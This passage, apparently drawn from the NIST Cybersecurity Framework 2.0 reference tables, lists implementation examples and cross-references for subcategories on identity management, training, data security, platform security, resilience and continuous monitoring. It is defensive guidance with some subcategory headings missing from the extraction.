  SP 800-53 Rev 5.1.1: AU-01
  SP 800-53 Rev 5.1.1: CA-01
  SP 800-53 Rev 5.1.1: CM-01
  SP 800-53 Rev 5.1.1: CP-01
  SP 800-53 Rev 5.1.1: IA-01
  SP 800-53 Rev 5.1.1: IR-01
  SP 800-53 Rev 5.1.1: MA-01
  SP 800-53 Rev 5.1.1: MP-01
  SP 800-53 Rev 5.1.1: PE-01
  SP 800-53 Rev 5.1.1: PL-01
  SP 800-53 Rev 5.1.1: PM-01
  SP 800-53 Rev 5.1.1: PS-01
  SP 800-53 Rev 5.1.1: PT-01
  SP 800-53 Rev 5.1.1: RA-01
  SP 800-53 Rev 5.1.1: SA-01
  SP 800-53 Rev 5.1.1: SC-01
  SP 800-53 Rev 5.1.1: SI-01
  SP 800-53 Rev 5.1.1: SR-01
  SP 800-53 Rev 5.1.1: CA-02
  SP 800-53 Rev 5.1.1: CA-05



Implementation Examples:
  Ex1: Conduct collaborative lessons learned sessions with suppliers
  Ex2: Annually review cybersecurity policies, processes, and procedures to take lessons learned into account
  Ex3: Use metrics to assess operational cybersecurity performance over time

Informative References:
  CRI Profile v2.0: ID.IM-03
  CRI Profile v2.0: ID.IM-03.01
  CRI Profile v2.0: ID.IM-03.02
  CSF v1.1: PR.IP-7
  CSF v1.1: PR.IP-8
  CSF v1.1: DE.DP-5
  CSF v1.1: RS.IM-1
  CSF v1.1: RS.IM-2
  CSF v1.1: RC.IM-1
  CSF v1.1: RC.IM-2
  SP 800-221A: GV.AD-1
  SP 800-221A: MA.RM-6
  SP 800-221A: MA.IM-1
  SP 800-53 Rev 5.1.1: AC-01
  SP 800-53 Rev 5.1.1: AT-01
  SP 800-53 Rev 5.1.1: AU-01
  SP 800-53 Rev 5.1.1: CA-01
  SP 800-53 Rev 5.1.1: CM-01
  SP 800-53 Rev 5.1.1: CP-01
  SP 800-53 Rev 5.1.1: IA-01
  SP 800-53 Rev 5.1.1: IR-01
  SP 800-53 Rev 5.1.1: MA-01
  SP 800-53 Rev 5.1.1: MP-01
  SP 800-53 Rev 5.1.1: PE-01
  SP 800-53 Rev 5.1.1: PL-01
  SP 800-53 Rev 5.1.1: PM-01
  SP 800-53 Rev 5.1.1: PS-01
  SP 800-53 Rev 5.1.1: PT-01
  SP 800-53 Rev 5.1.1: RA-01
  SP 800-53 Rev 5.1.1: SA-01
  SP 800-53 Rev 5.1.1: SC-01
  SP 800-53 Rev 5.1.1: SI-01
  SP 800-53 Rev 5.1.1: SR-01
  SP 800-53 Rev 5.1.1: CA-02
  SP 800-53 Rev 5.1.1: CA-05
  SP 800-53 Rev 5.1.1: CA-07
  SP 800-53 Rev 5.1.1: CA-08



Implementation Examples:
  Ex1: Establish contingency plans (e.g., incident response, business continuity, disaster recovery) for responding to and recovering from adverse events that can interfere with operations, expose confidential information, or otherwise endanger the organization's mission and viability
  Ex2: Include contact and communication information, processes for handling common scenarios, and criteria for prioritization, escalation, and elevation in all contingency plans
  Ex3: Create a vulnerability management plan to identify and assess all types of vulnerabilities and to prioritize, test, and implement risk responses
  Ex4: Communicate cybersecurity plans (including updates) to those responsible for carrying them out and to affected parties
  Ex5: Review and update all cybersecurity plans annually or when a need for significant improvements is identified

Informative References:
  CRI Profile v2.0: ID.IM-04
  CRI Profile v2.0: ID.IM-04.01
  CRI Profile v2.0: ID.IM-04.02
  CRI Profile v2.0: ID.IM-04.03
  CRI Profile v2.0: ID.IM-04.04
  CRI Profile v2.0: ID.IM-04.05
  CRI Profile v2.0: ID.IM-04.06
  CRI Profile v2.0: ID.IM-04.07
  CRI Profile v2.0: ID.IM-04.08
  CSF v1.1: PR.IP-9
  CSF v1.1: RS.IM-1
  CSF v1.1: RC.IM-1
  CSF v1.1: PR.IP-10
  SP 800-221A: MA.RR-4
  SP 800-221A: MA.IM-1
  SP 800-53 Rev 5.1.1: CP-02
  SP 800-53 Rev 5.1.1: IR-08
  SP 800-53 Rev 5.1.1: PL-02
  SP 800-53 Rev 5.1.1: SR-02

Informative References:
  CRI Profile v2.0: PR
  CSF v1.1: PR



Informative References:
  CRI Profile v2.0: PR.AA
  CSF v1.1: PR.AC

Implementation Examples:
  Ex1: Initiate requests for new access or additional access for employees, contractors, and others, and track, review, and fulfill the requests, with permission from system or data owners when needed
  Ex2: Issue, manage, and revoke cryptographic certificates and identity tokens, cryptographic keys (i.e., key management), and other credentials
  Ex3: Select a unique identifier for each device from immutable hardware characteristics or an identifier securely provisioned to the device
  Ex4: Physically label authorized hardware with an identifier for inventory and servicing purposes

Informative References:
  CIS Controls v8.0: 5.1
  CIS Controls v8.0: 6.7
  CRI Profile v2.0: PR.AA-01
  CRI Profile v2.0: PR.AA-01.01
  CRI Profile v2.0: PR.AA-01.02
  CSF v1.1: PR.AC-1
  SP 800-53 Rev 5.1.1: AC-01
  SP 800-53 Rev 5.1.1: AC-02
  SP 800-53 Rev 5.1.1: AC-14
  SP 800-53 Rev 5.1.1: IA-01
  SP 800-53 Rev 5.1.1: IA-02
  SP 800-53 Rev 5.1.1: IA-03
  SP 800-53 Rev 5.1.1: IA-04
  SP 800-53 Rev 5.1.1: IA-05
  SP 800-53 Rev 5.1.1: IA-06
  SP 800-53 Rev 5.1.1: IA-07
  SP 800-53 Rev 5.1.1: IA-08
  SP 800-53 Rev 5.1.1: IA-09
  SP 800-53 Rev 5.1.1: IA-10
  SP 800-53 Rev 5.1.1: IA-11



Implementation Examples:
  Ex1: Verify a person's claimed identity at enrollment time using government-issued identity credentials (e.g., passport, visa, driver's license)
  Ex2: Issue a different credential for each person (i.e., no credential sharing)

Informative References:
  CRI Profile v2.0: PR.AA-02
  CRI Profile v2.0: PR.AA-02.01
  CSF v1.1: PR.AC-6
  SP 800-53 Rev 5.1.1: IA-12

Implementation Examples:
  Ex1: Require multifactor authentication
  Ex2: Enforce policies for the minimum strength of passwords, PINs, and similar authenticators
  Ex3: Periodically reauthenticate users, services, and hardware based on risk (e.g., in zero trust architectures)
  Ex4: Ensure that authorized personnel can access accounts essential for protecting safety under emergency conditions

Informative References:
  CRI Profile v2.0: PR.AA-03
  CRI Profile v2.0: PR.AA-03.01
  CRI Profile v2.0: PR.AA-03.02
  CRI Profile v2.0: PR.AA-03.03
  CSF v1.1: PR.AC-3
  CSF v1.1: PR.AC-7
  SP 800-218: PO.5.2
  SP 800-53 Rev 5.1.1: AC-07
  SP 800-53 Rev 5.1.1: AC-12
  SP 800-53 Rev 5.1.1: IA-02
  SP 800-53 Rev 5.1.1: IA-03
  SP 800-53 Rev 5.1.1: IA-05
  SP 800-53 Rev 5.1.1: IA-07
  SP 800-53 Rev 5.1.1: IA-08
  SP 800-53 Rev 5.1.1: IA-09
  SP 800-53 Rev 5.1.1: IA-10
  SP 800-53 Rev 5.1.1: IA-11



Implementation Examples:
  Ex1: Protect identity assertions that are used to convey authentication and user information through single sign-on systems
  Ex2: Protect identity assertions that are used to convey authentication and user information between federated systems
  Ex3: Implement standards-based approaches for identity assertions in all contexts, and follow all guidance for the generation (e.g., data models, metadata), protection (e.g., digital signing, encryption), and verification (e.g., signature validation) of identity assertions

Informative References:
  CRI Profile v2.0: PR.AA-04
  CRI Profile v2.0: PR.AA-04.01
  SP 800-53 Rev 5.1.1: IA-13



Implementation Examples:
  Ex1: Review logical and physical access privileges periodically and whenever someone changes roles or leaves the organization, and promptly rescind privileges that are no longer needed
  Ex2: Take attributes of the requester and the requested resource into account for authorization decisions (e.g., geolocation, day/time, requester endpoint's cyber health)
  Ex3: Restrict access and privileges to the minimum necessary (e.g., zero trust architecture)
  Ex4: Periodically review the privileges associated with critical business functions to confirm proper separation of duties

Informative References:
  CIS Controls v8.0: 3.3
  CIS Controls v8.0: 6.8
  CRI Profile v2.0: PR.AA-05
  CRI Profile v2.0: PR.AA-05.01
  CRI Profile v2.0: PR.AA-05.02
  CRI Profile v2.0: PR.AA-05.03
  CRI Profile v2.0: PR.AA-05.04
  CSF v1.1: PR.AC-1
  CSF v1.1: PR.AC-3
  CSF v1.1: PR.AC-4
  SP 800-218: PO.5.2
  SP 800-218: PS.1.1
  SP 800-53 Rev 5.1.1: AC-01
  SP 800-53 Rev 5.1.1: AC-02
  SP 800-53 Rev 5.1.1: AC-03
  SP 800-53 Rev 5.1.1: AC-05
  SP 800-53 Rev 5.1.1: AC-06
  SP 800-53 Rev 5.1.1: AC-10
  SP 800-53 Rev 5.1.1: AC-16
  SP 800-53 Rev 5.1.1: AC-17
  SP 800-53 Rev 5.1.1: AC-18
  SP 800-53 Rev 5.1.1: AC-19
  SP 800-53 Rev 5.1.1: AC-24
  SP 800-53 Rev 5.1.1: IA-13



Implementation Examples:
  Ex1: Use security guards, security cameras, locked entrances, alarm systems, and other physical controls to monitor facilities and restrict access
  Ex2: Employ additional physical security controls for areas that contain high-risk assets
  Ex3: Escort guests, vendors, and other third parties within areas that contain business-critical assets

Informative References:
  CRI Profile v2.0: PR.AA-06
  CRI Profile v2.0: PR.AA-06.01
  CRI Profile v2.0: PR.AA-06.02
  CSF v1.1: PR.AC-2
  CSF v1.1: PR.PT-4
  SP 800-218: PO.5.2
  SP 800-53 Rev 5.1.1: PE-02
  SP 800-53 Rev 5.1.1: PE-03
  SP 800-53 Rev 5.1.1: PE-04
  SP 800-53 Rev 5.1.1: PE-05
  SP 800-53 Rev 5.1.1: PE-06
  SP 800-53 Rev 5.1.1: PE-08
  SP 800-53 Rev 5.1.1: PE-18
  SP 800-53 Rev 5.1.1: PE-19
  SP 800-53 Rev 5.1.1: PE-20

Informative References:
  CRI Profile v2.0: PR.AT
  CSF v1.1: PR.AT
  SP 800-218: PO.2.2



Implementation Examples:
  Ex1: Provide basic cybersecurity awareness and training to employees, contractors, partners, suppliers, and all other users of the organization's non-public resources
  Ex2: Train personnel to recognize social engineering attempts and other common attacks, report attacks and suspicious activity, comply with acceptable use policies, and perform basic cyber hygiene tasks (e.g., patching software, choosing passwords, protecting credentials)
  Ex3: Explain the consequences of cybersecurity policy violations, both to individual users and the organization as a whole
  Ex4: Periodically assess or test users on their understanding of basic cybersecurity practices
  Ex5: Require annual refreshers to reinforce existing practices and introduce new practices

Informative References:
  CIS Controls v8.0: 14.1
  CRI Profile v2.0: PR.AT-01
  CRI Profile v2.0: PR.AT-01.01
  CRI Profile v2.0: PR.AT-01.02
  CRI Profile v2.0: PR.AT-01.03
  CRI Profile v2.0: PR.AT-01.04
  CSF v1.1: PR.AT-1
  CSF v1.1: PR.AT-3
  CSF v1.1: RS.CO-1
  SP 800-218: PO.2.2
  SP 800-221A: GV.CT-3
  SP 800-221A: GV.RR-2
  SP 800-53 Rev 5.1.1: AT-02
  SP 800-53 Rev 5.1.1: AT-03



Implementation Examples:
  Ex1: Identify the specialized roles within the organization that require additional cybersecurity training, such as physical and cybersecurity personnel, finance personnel, senior leadership, and anyone with access to business-critical data
  Ex2: Provide role-based cybersecurity awareness and training to all those in specialized roles, including contractors, partners, suppliers, and other third parties
  Ex3: Periodically assess or test users on their understanding of cybersecurity practices for their specialized roles
  Ex4: Require annual refreshers to reinforce existing practices and introduce new practices

Informative References:
  CIS Controls v8.0: 14.9
  CRI Profile v2.0: PR.AT-02
  CRI Profile v2.0: PR.AT-02.01
  CRI Profile v2.0: PR.AT-02.02
  CRI Profile v2.0: PR.AT-02.03
  CRI Profile v2.0: PR.AT-02.04
  CRI Profile v2.0: PR.AT-02.05
  CRI Profile v2.0: PR.AT-02.06
  CRI Profile v2.0: PR.AT-02.07
  CRI Profile v2.0: PR.AT-02.08
  CSF v1.1: PR.AT-2
  CSF v1.1: PR.AT-3
  CSF v1.1: PR.AT-4
  CSF v1.1: PR.AT-5
  SP 800-218: PO.2.2
  SP 800-221A: GV.CT-3
  SP 800-221A: GV.CT-4
  SP 800-221A: GV.RR-2
  SP 800-53 Rev 5.1.1: AT-03

Informative References:
  CRI Profile v2.0: PR.DS
  CSF v1.1: PR.DS



Implementation Examples:
  Ex1: Use encryption, digital signatures, and cryptographic hashes to protect the confidentiality and integrity of stored data in files, databases, virtual machine disk images, container images, and other resources
  Ex2: Use full disk encryption to protect data stored on user endpoints
  Ex3: Confirm the integrity of software by validating signatures
  Ex4: Restrict the use of removable media to prevent data exfiltration
  Ex5: Physically secure removable media containing unencrypted sensitive information, such as within locked offices or file cabinets

Informative References:
  CIS Controls v8.0: 3.11
  CRI Profile v2.0: PR.DS-01
  CRI Profile v2.0: PR.DS-01.01
  CRI Profile v2.0: PR.DS-01.02
  CRI Profile v2.0: PR.DS-01.03
  CSF v1.1: PR.DS-1
  CSF v1.1: PR.DS-5
  CSF v1.1: PR.DS-6
  CSF v1.1: PR.PT-2
  SP 800-218: PS.1.1
  SP 800-218: PS.2.1
  SP 800-218: PS.3.1
  SP 800-53 Rev 5.1.1: CA-03
  SP 800-53 Rev 5.1.1: CP-09
  SP 800-53 Rev 5.1.1: MP-08
  SP 800-53 Rev 5.1.1: SC-04
  SP 800-53 Rev 5.1.1: SC-07
  SP 800-53 Rev 5.1.1: SC-12
  SP 800-53 Rev 5.1.1: SC-13
  SP 800-53 Rev 5.1.1: SC-28
  SP 800-53 Rev 5.1.1: SC-32
  SP 800-53 Rev 5.1.1: SC-39
  SP 800-53 Rev 5.1.1: SC-43
  SP 800-53 Rev 5.1.1: SI-03
  SP 800-53 Rev 5.1.1: SI-04
  SP 800-53 Rev 5.1.1: SI-07



Implementation Examples:
  Ex1: Use encryption, digital signatures, and cryptographic hashes to protect the confidentiality and integrity of network communications
  Ex2: Automatically encrypt or block outbound emails and other communications that contain sensitive data, depending on the data classification
  Ex3: Block access to personal email, file sharing, file storage services, and other personal communications applications and services from organizational systems and networks
  Ex4: Prevent reuse of sensitive data from production environments (e.g., customer records) in development, testing, and other non-production environments

Informative References:
  CIS Controls v8.0: 3.10
  CRI Profile v2.0: PR.DS-02
  CRI Profile v2.0: PR.DS-02.01
  CSF v1.1: PR.DS-2
  CSF v1.1: PR.DS-5
  SP 800-53 Rev 5.1.1: AU-16
  SP 800-53 Rev 5.1.1: CA-03
  SP 800-53 Rev 5.1.1: SC-04
  SP 800-53 Rev 5.1.1: SC-07
  SP 800-53 Rev 5.1.1: SC-08
  SP 800-53 Rev 5.1.1: SC-11
  SP 800-53 Rev 5.1.1: SC-12
  SP 800-53 Rev 5.1.1: SC-13
  SP 800-53 Rev 5.1.1: SC-16
  SP 800-53 Rev 5.1.1: SC-40
  SP 800-53 Rev 5.1.1: SC-43
  SP 800-53 Rev 5.1.1: SI-03
  SP 800-53 Rev 5.1.1: SI-04
  SP 800-53 Rev 5.1.1: SI-07



Implementation Examples:
  Ex1: Remove data that must remain confidential (e.g., from processors and memory) as soon as it is no longer needed
  Ex2: Protect data in use from access by other users and processes of the same platform

Informative References:
  CRI Profile v2.0: PR.DS-10
  CRI Profile v2.0: PR.DS-10.01
  CSF v1.1: PR.DS-5
  SP 800-53 Rev 5.1.1: AC-02
  SP 800-53 Rev 5.1.1: AC-03
  SP 800-53 Rev 5.1.1: AC-04
  SP 800-53 Rev 5.1.1: AU-09
  SP 800-53 Rev 5.1.1: AU-13
  SP 800-53 Rev 5.1.1: CA-03
  SP 800-53 Rev 5.1.1: CP-09
  SP 800-53 Rev 5.1.1: SA-08
  SP 800-53 Rev 5.1.1: SC-04
  SP 800-53 Rev 5.1.1: SC-07
  SP 800-53 Rev 5.1.1: SC-11
  SP 800-53 Rev 5.1.1: SC-13
  SP 800-53 Rev 5.1.1: SC-24
  SP 800-53 Rev 5.1.1: SC-32
  SP 800-53 Rev 5.1.1: SC-39
  SP 800-53 Rev 5.1.1: SC-40
  SP 800-53 Rev 5.1.1: SC-43
  SP 800-53 Rev 5.1.1: SI-03
  SP 800-53 Rev 5.1.1: SI-04
  SP 800-53 Rev 5.1.1: SI-07
  SP 800-53 Rev 5.1.1: SI-10
  SP 800-53 Rev 5.1.1: SI-16



Implementation Examples:
  Ex1: Continuously back up critical data in near-real-time, and back up other data frequently at agreed-upon schedules
  Ex2: Test backups and restores for all types of data sources at least annually
  Ex3: Securely store some backups offline and offsite so that an incident or disaster will not damage them
  Ex4: Enforce geographic separation and geolocation restrictions for data backup storage

Informative References:
  CIS Controls v8.0: 11.2
  CIS Controls v8.0: 11.3
  CIS Controls v8.0: 11.5
  CRI Profile v2.0: PR.DS-11
  CRI Profile v2.0: PR.DS-11.01
  CSF v1.1: PR.IP-4
  SP 800-218: PS.3.1
  SP 800-53 Rev 5.1.1: CP-06
  SP 800-53 Rev 5.1.1: CP-09

Informative References:
  CRI Profile v2.0: PR.PS



Implementation Examples:
  Ex1: Establish, test, deploy, and maintain hardened baselines that enforce the organization's cybersecurity policies and provide only essential capabilities (i.e., principle of least functionality)
  Ex2: Review all default configuration settings that may potentially impact cybersecurity when installing or upgrading software
  Ex3: Monitor implemented software for deviations from approved baselines

Informative References:
  CIS Controls v8.0: 4.1
  CIS Controls v8.0: 4.2
  CRI Profile v2.0: PR.PS-01
  CRI Profile v2.0: PR.PS-01.01
  CRI Profile v2.0: PR.PS-01.02
  CRI Profile v2.0: PR.PS-01.03
  CRI Profile v2.0: PR.PS-01.04
  CRI Profile v2.0: PR.PS-01.05
  CRI Profile v2.0: PR.PS-01.06
  CRI Profile v2.0: PR.PS-01.07
  CRI Profile v2.0: PR.PS-01.08
  CRI Profile v2.0: PR.PS-01.09
  CSF v1.1: PR.IP-1
  CSF v1.1: PR.IP-3
  CSF v1.1: PR.PT-2
  CSF v1.1: PR.PT-3
  SP 800-218: PO.5.2
  SP 800-218: PS.1.1
  SP 800-53 Rev 5.1.1: CM-01
  SP 800-53 Rev 5.1.1: CM-02
  SP 800-53 Rev 5.1.1: CM-03
  SP 800-53 Rev 5.1.1: CM-04
  SP 800-53 Rev 5.1.1: CM-05
  SP 800-53 Rev 5.1.1: CM-06
  SP 800-53 Rev 5.1.1: CM-07
  SP 800-53 Rev 5.1.1: CM-08
  SP 800-53 Rev 5.1.1: CM-09
  SP 800-53 Rev 5.1.1: CM-10
  SP 800-53 Rev 5.1.1: CM-11



Implementation Examples:
  Ex1: Perform routine and emergency patching within the timeframes specified in the vulnerability management plan
  Ex2: Update container images, and deploy new container instances to replace rather than update existing instances
  Ex3: Replace end-of-life software and service versions with supported, maintained versions
  Ex4: Uninstall and remove unauthorized software and services that pose undue risks
  Ex5: Uninstall and remove any unnecessary software components (e.g., operating system utilities) that attackers might misuse
  Ex6: Define and implement plans for software and service end-of-life maintenance support and obsolescence

Informative References:
  CIS Controls v8.0: 2.2
  CIS Controls v8.0: 2.3
  CRI Profile v2.0: PR.PS-02
  CRI Profile v2.0: PR.PS-02.01
  CRI Profile v2.0: PR.PS-02.02
  CRI Profile v2.0: PR.PS-02.03
  CSF v1.1: PR.IP-12
  CSF v1.1: PR.MA-2
  SP 800-218: PO.5.2
  SP 800-53 Rev 5.1.1: CM-11
  SP 800-53 Rev 5.1.1: MA-03(06)
  SP 800-53 Rev 5.1.1: SA-10(01)
  SP 800-53 Rev 5.1.1: SI-02
  SP 800-53 Rev 5.1.1: SI-07



Implementation Examples:
  Ex1: Replace hardware when it lacks needed security capabilities or when it cannot support software with needed security capabilities
  Ex2: Define and implement plans for hardware end-of-life maintenance support and obsolescence
  Ex3: Perform hardware disposal in a secure, responsible, and auditable manner

Informative References:
  CIS Controls v8.0: 1.2
  CRI Profile v2.0: PR.PS-03
  CRI Profile v2.0: PR.PS-03.01
  CSF v1.1: PR.MA-1
  CSF v1.1: PR.DS-3
  SP 800-218: PO.5.2
  SP 800-53 Rev 5.1.1: CM-07(09)
  SP 800-53 Rev 5.1.1: SA-10(03)
  SP 800-53 Rev 5.1.1: SC-03(01)
  SP 800-53 Rev 5.1.1: SC-39(01)
  SP 800-53 Rev 5.1.1: SC-49
  SP 800-53 Rev 5.1.1: SC-51

Implementation Examples:
  Ex1: Configure all operating systems, applications, and services (including cloud-based services) to generate log records
  Ex2: Configure log generators to securely share their logs with the organization's logging infrastructure systems and services
  Ex3: Configure log generators to record the data needed by zero-trust architectures

Informative References:
  CIS Controls v8.0: 8.2
  CRI Profile v2.0: PR.PS-04
  CRI Profile v2.0: PR.PS-04.01
  CRI Profile v2.0: PR.PS-04.02
  CRI Profile v2.0: PR.PS-04.03
  CSF v1.1: PR.PT-1
  SP 800-218: PO.3.3
  SP 800-53 Rev 5.1.1: AU-02
  SP 800-53 Rev 5.1.1: AU-03
  SP 800-53 Rev 5.1.1: AU-06
  SP 800-53 Rev 5.1.1: AU-07
  SP 800-53 Rev 5.1.1: AU-11
  SP 800-53 Rev 5.1.1: AU-12



Implementation Examples:
  Ex1: When risk warrants it, restrict software execution to permitted products only or deny the execution of prohibited and unauthorized software
  Ex2: Verify the source of new software and the software's integrity before installing it
  Ex3: Configure platforms to use only approved DNS services that block access to known malicious domains
  Ex4: Configure platforms to allow the installation of organization-approved software only

Informative References:
  CIS Controls v8.0: 2.5
  CRI Profile v2.0: PR.PS-05
  CRI Profile v2.0: PR.PS-05.01
  CRI Profile v2.0: PR.PS-05.02
  CRI Profile v2.0: PR.PS-05.03
  SP 800-53 Rev 5.1.1: CM-07(02)
  SP 800-53 Rev 5.1.1: CM-07(04)
  SP 800-53 Rev 5.1.1: CM-07(05)
  SP 800-53 Rev 5.1.1: SC-34

Implementation Examples:
  Ex1: Protect all components of organization-developed software from tampering and unauthorized access
  Ex2: Secure all software produced by the organization, with minimal vulnerabilities in their releases
  Ex3: Maintain the software used in production environments, and securely dispose of software once it is no longer needed

Informative References:
  CIS Controls v8.0: 16.1
  CRI Profile v2.0: PR.PS-06
  CRI Profile v2.0: PR.PS-06.01
  CRI Profile v2.0: PR.PS-06.02
  CRI Profile v2.0: PR.PS-06.03
  CRI Profile v2.0: PR.PS-06.04
  CRI Profile v2.0: PR.PS-06.05
  CRI Profile v2.0: PR.PS-06.06
  CRI Profile v2.0: PR.PS-06.07
  CRI Profile v2.0: PR.PS-06.08
  CRI Profile v2.0: PR.PS-06.09
  CRI Profile v2.0: PR.PS-06.10
  CSF v1.1: PR.IP-2
  SP 800-53 Rev 5.1.1: SA-03
  SP 800-53 Rev 5.1.1: SA-08
  SP 800-53 Rev 5.1.1: SA-10
  SP 800-53 Rev 5.1.1: SA-11
  SP 800-53 Rev 5.1.1: SA-15
  SP 800-53 Rev 5.1.1: SA-17



Informative References:
  CRI Profile v2.0: PR.IR

Implementation Examples:
  Ex1: Logically segment organization networks and cloud-based platforms according to trust boundaries and platform types (e.g., IT, IoT, OT, mobile, guests), and permit required communications only between segments
  Ex2: Logically segment organization networks from external networks, and permit only necessary communications to enter the organization's networks from the external networks
  Ex3: Implement zero trust architectures to restrict network access to each resource to the minimum necessary
  Ex4: Check the cyber health of endpoints before allowing them to access and use production resources

Informative References:
  CIS Controls v8.0: 3.12
  CIS Controls v8.0: 12.2
  CRI Profile v2.0: PR.IR-01
  CRI Profile v2.0: PR.IR-01.01
  CRI Profile v2.0: PR.IR-01.02
  CRI Profile v2.0: PR.IR-01.03
  CRI Profile v2.0: PR.IR-01.04
  CRI Profile v2.0: PR.IR-01.05
  CRI Profile v2.0: PR.IR-01.06
  CRI Profile v2.0: PR.IR-01.07
  CRI Profile v2.0: PR.IR-01.08
  CSF v1.1: PR.AC-3
  CSF v1.1: PR.AC-5
  CSF v1.1: PR.DS-7
  CSF v1.1: PR.PT-4
  SP 800-218: PO.5.1
  SP 800-53 Rev 5.1.1: AC-03
  SP 800-53 Rev 5.1.1: AC-04
  SP 800-53 Rev 5.1.1: SC-04
  SP 800-53 Rev 5.1.1: SC-05
  SP 800-53 Rev 5.1.1: SC-07



Implementation Examples:
  Ex1: Protect organizational equipment from known environmental threats, such as flooding, fire, wind, and excessive heat and humidity
  Ex2: Include protection from environmental threats and provisions for adequate operating infrastructure in requirements for service providers that operate systems on the organization's behalf

Informative References:
  CRI Profile v2.0: PR.IR-02
  CRI Profile v2.0: PR.IR-02.01
  CSF v1.1: PR.IP-5
  SP 800-53 Rev 5.1.1: CP-02
  SP 800-53 Rev 5.1.1: PE-09
  SP 800-53 Rev 5.1.1: PE-10
  SP 800-53 Rev 5.1.1: PE-11
  SP 800-53 Rev 5.1.1: PE-12
  SP 800-53 Rev 5.1.1: PE-13
  SP 800-53 Rev 5.1.1: PE-14
  SP 800-53 Rev 5.1.1: PE-15
  SP 800-53 Rev 5.1.1: PE-18
  SP 800-53 Rev 5.1.1: PE-23

Implementation Examples:
  Ex1: Avoid single points of failure in systems and infrastructure
  Ex2: Use load balancing to increase capacity and improve reliability
  Ex3: Use high-availability components like redundant storage and power supplies to improve system reliability

Informative References:
  CRI Profile v2.0: PR.IR-03
  CRI Profile v2.0: PR.IR-03.01
  CSF v1.1: PR.PT-5
  SP 800-53 Rev 5.1.1: CP
  SP 800-53 Rev 5.1.1: IR
  SP 800-53 Rev 5.1.1: SA-08
  SP 800-53 Rev 5.1.1: SC-06
  SP 800-53 Rev 5.1.1: SC-24
  SP 800-53 Rev 5.1.1: SC-36
  SP 800-53 Rev 5.1.1: SC-39
  SP 800-53 Rev 5.1.1: SI-13

Implementation Examples:
  Ex1: Monitor usage of storage, power, compute, network bandwidth, and other resources
  Ex2: Forecast future needs, and scale resources accordingly

Informative References:
  CRI Profile v2.0: PR.IR-04
  CRI Profile v2.0: PR.IR-04.01
  CRI Profile v2.0: PR.IR-04.02
  CSF v1.1: PR.DS-4
  SP 800-53 Rev 5.1.1: CP-06
  SP 800-53 Rev 5.1.1: CP-07
  SP 800-53 Rev 5.1.1: CP-08
  SP 800-53 Rev 5.1.1: PM-03
  SP 800-53 Rev 5.1.1: PM-09



Informative References:
  CRI Profile v2.0: DE
  CSF v1.1: DE

Informative References:
  CRI Profile v2.0: DE.CM
  CSF v1.1: DE.CM

Implementation Examples:
  Ex1: Monitor DNS, BGP, and other network services for adverse events
  Ex2: Monitor wired and wireless networks for connections from unauthorized endpoints
  Ex3: Monitor facilities for unauthorized or rogue wireless networks
  Ex4: Compare actual network flows against baselines to detect deviations
  Ex5: Monitor network communications to identify changes in security postures for zero trust purposes

Informative References:
  CIS Controls v8.0: 13.1
  CRI Profile v2.0: DE.CM-01
  CRI Profile v2.0: DE.CM-01.01
  CRI Profile v2.0: DE.CM-01.02
  CRI Profile v2.0: DE.CM-01.03
  CRI Profile v2.0: DE.CM-01.04
  CRI Profile v2.0: DE.CM-01.05
  CRI Profile v2.0: DE.CM-01.06
  CSF v1.1: DE.CM-1
  CSF v1.1: DE.CM-4
  CSF v1.1: DE.CM-5
  CSF v1.1: DE.CM-7
  SP 800-53 Rev 5.1.1: AC-02
  SP 800-53 Rev 5.1.1: AU-12
  SP 800-53 Rev 5.1.1: CA-07
  SP 800-53 Rev 5.1.1: CM-03
  SP 800-53 Rev 5.1.1: SC-05
  SP 800-53 Rev 5.1.1: SC-07
  SP 800-53 Rev 5.1.1: SI-04



Implementation Examples:
  Ex1: Monitor logs from physical access control systems (e.g., badge readers) to find unusual access patterns (e.g., deviations from the norm) and failed access attempts
  Ex2: Review and monitor physical access records (e.g., from visitor registration, sign-in sheets)
  Ex3: Monitor physical access controls (e.g., locks, latches, hinge pins, alarms) for signs of tampering
  Ex4: Monitor the physical environment using alarm systems, cameras, and security guards

Informative References:
  CRI Profile v2.0: DE.CM-02
  CRI Profile v2.0: DE.CM-02.01
  CSF v1.1: DE.CM-2
  SP 800-53 Rev 5.1.1: CA-07
  SP 800-53 Rev 5.1.1: PE-03
  SP 800-53 Rev 5.1.1: PE-06
  SP 800-53 Rev 5.1.1: PE-20

Implementation Examples:
  Ex1: Use behavior analytics software to detect anomalous user activity to mitigate insider threats
  Ex2: Monitor logs from logical access control systems to find unusual access patterns and failed access attempts
  Ex3: Continuously monitor deception technology, including user accounts, for any usage

Informative References:
  CIS Controls v8.0: 10.7
  CRI Profile v2.0: DE.CM-03
  CRI Profile v2.0: DE.CM-03.01
  CRI Profile v2.0: DE.CM-03.02
  CRI Profile v2.0: DE.CM-03.03
  CSF v1.1: DE.CM-3
  CSF v1.1: DE.CM-7
  SP 800-53 Rev 5.1.1: AC-02
  SP 800-53 Rev 5.1.1: AU-12
  SP 800-53 Rev 5.1.1: AU-13
  SP 800-53 Rev 5.1.1: CA-07
  SP 800-53 Rev 5.1.1: CM-10
  SP 800-53 Rev 5.1.1: CM-11



Implementation Examples:
  Ex1: Monitor remote and onsite administration and maintenance activities that external providers perform on organizational systems
  Ex2: Monitor activity from cloud-based services, internet service providers, and other service providers for deviations from expected behavior

Informative References:
  CIS Controls v8.0: 15.2
  CIS Controls v8.0: 15.6
  CRI Profile v2.0: DE.CM-06
  CRI Profile v2.0: DE.CM-06.01
  CRI Profile v2.0: DE.CM-06.02
  CSF v1.1: DE.CM-6
  CSF v1.1: DE.CM-7
  SP 800-53 Rev 5.1.1: CA-07
  SP 800-53 Rev 5.1.1: PS-07
  SP 800-53 Rev 5.1.1: SA-04
  SP 800-53 Rev 5.1.1: SA-09
  SP 800-53 Rev 5.1.1: SI-04



Implementation Examples Informative References
Subcategory DE.CM-09
Implementation Examples:
Ex1: Monitor email, web, file sharing, collaboration services, and other common attack vectors to detect malware, phishing, data leaks and exfiltration, and other adverse events
Ex2: Monitor authentication attempts to identify attacks against credentials and unauthorized credential reuse
Ex3: Monitor software configurations for deviations from security baselines
Ex4: Monitor hardware and software for signs of tampering
Ex5: Use technologies with a presence on endpoints to detect cyber health issues (e.g., missing patches, malware infections, unauthorized software), and redirect the endpoints to a remediation environment before access is authorized
Informative References:
CIS Controls v8.0: 10.1
CRI Profile v2.0: DE.CM-09, DE.CM-09.01, DE.CM-09.02, DE.CM-09.03
CSF v1.1: PR.DS-6, PR.DS-8, DE.CM-4, DE.CM-5, DE.CM-7
